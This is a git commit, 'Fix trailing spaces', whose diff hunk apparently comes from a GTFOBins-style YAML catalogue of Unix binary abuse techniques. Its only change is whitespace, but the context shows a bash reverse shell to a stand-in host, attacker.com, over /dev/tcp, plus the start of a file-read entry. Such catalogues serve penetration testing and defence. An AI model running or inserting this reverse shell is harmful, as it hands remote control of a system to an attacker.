Fix trailing spaces

This commit is contained in:
Andrea Cardaci
2018-05-28 19:55:44 +02:00
parent 89985be143
commit 004b4bf828
8 changed files with 11 additions and 12 deletions

View File

@@ -40,7 +40,7 @@ functions:
export RHOST=attacker.com
export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
file-read:
file-read:
- description: It trims trailing newlines.
code: |
export LFILE=file_to_read